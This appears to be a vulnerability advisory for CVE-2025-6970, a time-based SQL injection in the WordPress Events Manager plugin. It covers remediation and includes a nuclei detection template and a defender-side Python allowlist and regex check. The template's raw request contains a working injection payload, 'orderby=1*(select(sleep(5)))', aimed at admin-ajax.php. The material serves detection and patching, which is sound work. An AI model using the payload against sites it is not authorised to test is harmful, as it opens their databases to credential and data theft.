WordPress Events Manager SQL Injection Vulnerability

Vulnerability information

Vulnerability name: WordPress Events Manager SQL Injection Vulnerability

Vulnerability identifiers:

  • CVE: CVE-2025-6970

Vulnerability type: SQL injection

Severity: Critical

Description: The Events Manager plugin for WordPress (calendar, bookings, ticketing and related features) contains an unauthenticated SQL injection vulnerability in versions 7.0.3 and earlier, triggered through the orderby parameter. Because the user-supplied orderby parameter is insufficiently escaped and the existing SQL query is not adequately prepared, an unauthenticated attacker can append additional SQL to the existing query and potentially extract sensitive information from the database. The affected plugin is widely used on WordPress sites to manage events, bookings and tickets. The technical root cause is insufficient input validation, which permits time-based SQL injection. The vulnerability can lead to serious security risks, including but not limited to disclosure of user credentials, personal information and other confidential data. No authentication is required to exploit it, and exploitation can be automated, which increases its impact. It is recommended to update the plugin immediately to version 6.6.5 or 7.0.4 or later, or to temporarily disable the plugin until the fix can be applied.

Vendor: wp-events-plugin

Product: Events Manager – Calendar, Bookings, Tickets, and more!

Affected versions: version <= 7.0.3

Source: https://github.com/projectdiscovery/nuclei-templates/blob/fdf11c48a0f654b23b687565ef3f2f533f638740/http%2Fcves%2F2025%2FCVE-2025-6970.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2025-6970

info:
  name: WordPress Events Manager <= 7.0.3 - Unauthenticated SQL Injection via orderby Parameter
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the 'orderby' parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    An attacker can exploit this vulnerability to perform time-based SQL injection attacks, potentially extracting sensitive information from the database including user credentials, personal information, and other confidential data.
  remediation: |
    Update the Events Manager plugin to version 6.6.5 or 7.0.4 or later which fixes this vulnerability. If immediate update is not possible, consider temporarily disabling the plugin until the fix can be applied.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6970
    - https://wpscan.com/vulnerability/CVE-2025-6970
    - https://patchstack.com/database/vulnerability/events-manager/wordpress-events-manager-calendar-bookings-tickets-and-more-plugin-7-0-3-unauthenticated-sql-injection-via-orderby-parameter
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager/events-manager-703-unauthenticated-sql-injection-via-orderby-parameter
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6970
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09677
    cpe: cpe:2.3:a:wp-events-plugin:events_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp-events-plugin
    product: events_manager
    publicwww-query: "/wp-content/plugins/events-manager/"
  tags: cve,cve2025,events-manager,sqli,time-based,wordpress,wpscan,wp-plugin,unauth

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=search_events&orderby=1*(select(sleep(5)))

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'em-item-info', 'em-item-title', 'em-item-desc')
          - status_code == 200
          - 'duration>=5'
        condition: and
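Added example (not the plugin's code and not part of the nuclei template): a defender-side check for the request shape the template sends. It parses the admin-ajax.php form body, validates orderby against an allowlist of sort columns (the allowlist contents are an assumption for illustration; a real fix derives them from the columns the query actually sorts on), and reports whether a rejected value carries the time-based pattern seen in the payload above.

```python
import re
from urllib.parse import parse_qs

# Assumed allowlist of sort columns (illustrative, not the plugin's real list).
# An orderby value that is not exactly one of these (plus optional ASC/DESC)
# never reaches the SQL string, so arbitrary expressions like
# "1*(select(sleep(5)))" are rejected before any query is built.
ALLOWED_ORDERBY = {"event_start_date", "event_end_date", "event_name", "event_id"}

# Tokens characteristic of time-based injection in a sort parameter:
# delay functions, a nested SELECT, or SQL punctuation that a plain column
# name never contains.
TIME_BASED_SQLI = re.compile(
    r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(|\bselect\b|[()*;'\"]",
    re.IGNORECASE,
)


def is_safe_orderby(value: str) -> bool:
    """True only if value is one allowlisted column, optionally followed by ASC/DESC."""
    parts = value.strip().split()
    if not 1 <= len(parts) <= 2:
        return False
    if len(parts) == 2 and parts[1].upper() not in ("ASC", "DESC"):
        return False
    return parts[0] in ALLOWED_ORDERBY


def inspect_request(body: str) -> dict:
    """Classify an admin-ajax.php POST body; only action=search_events is in scope."""
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    orderby = params.get("orderby", [None])[0]
    result = {"action": action, "orderby": orderby, "safe": True, "reason": ""}
    if action != "search_events" or orderby is None:
        return result
    if not is_safe_orderby(orderby):
        result["safe"] = False
        result["reason"] = (
            "time-based SQLi pattern"
            if TIME_BASED_SQLI.search(orderby)
            else "orderby not in allowlist"
        )
    return result


if __name__ == "__main__":
    # Constructed sample bodies: the template's payload and a benign request.
    print(inspect_request("action=search_events&orderby=1*(select(sleep(5)))"))
    print(inspect_request("action=search_events&orderby=event_start_date+DESC"))
```

The same allowlist check is what a patched handler should apply server-side; the pattern match is only useful for logging or WAF triage, since a rejected value is rejected regardless of which reason fires.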



http://example.com/2025/07/17/github_1921392890/
Author: lianccc

Published: 17 July 2025